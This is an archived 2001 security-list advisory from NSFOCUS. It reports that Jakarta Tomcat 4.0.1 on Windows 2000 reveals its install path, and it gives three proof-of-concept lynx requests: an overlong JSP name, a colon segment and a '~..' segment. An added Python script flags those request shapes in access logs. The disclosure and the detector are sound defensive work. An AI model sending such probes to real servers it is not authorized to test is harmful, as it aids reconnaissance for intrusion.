Hello,

It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submitting an unusually long request (more than 222 bytes) or a
specially crafted request, we can get the web server's install path.

How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version
-----------------------
Jakarta Tomcat v4.0.1
Microsoft Windows 2000

I sent this information to the vendor a week ago, but I have not received any reply! :(

Best Regards
analysistat_private
NSFOCUS Security Team
<http://www.nsfocus.com>
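A log check for the three request shapes in the post above, as an added example that is not part of the original message or of Tomcat. It assumes Common Log Format access logs and reads "more than 222 bytes" as the length of the JSP name before the .jsp extension; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_NAME_BYTES = 222  # assumption: the post's limit applies to the name before ".jsp"

# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_path(target):
    """Return which of the post's request shapes a request target matches."""
    path = unquote(target.split("?", 1)[0])  # drop query, decode %3A / %7E forms
    if not path.lower().endswith(".jsp"):
        return []
    segments = path.split("/")
    stem = segments[-1][:-len(".jsp")]
    reasons = []
    if len(stem.encode("utf-8")) > MAX_NAME_BYTES:
        reasons.append("overlong-name")          # /AAAA...A.jsp
    if ":" in segments[:-1]:
        reasons.append("colon-segment")          # /:/x.jsp
    if "~.." in segments[:-1]:
        reasons.append("tilde-dotdot-segment")   # /~../x.jsp
    return reasons

def scan_log(lines):
    """Return (line_number, reasons) for every log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = classify_path(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log; addresses, timestamps, status and size are placeholders.
PREFIX = '127.0.0.1 - - [23/Nov/2001:10:00:00 -0800] '
SAMPLE_LOG = [
    PREFIX + '"GET /index.jsp HTTP/1.0" 200 512',
    PREFIX + '"GET /' + "A" * 223 + '.jsp HTTP/1.0" 200 512',
    PREFIX + '"GET /:/x.jsp HTTP/1.0" 200 512',
    PREFIX + '"GET /%7E../x.jsp HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

Because the path is percent-decoded before matching, encoded forms of the same requests are flagged as well.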
This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 14:37:23 PST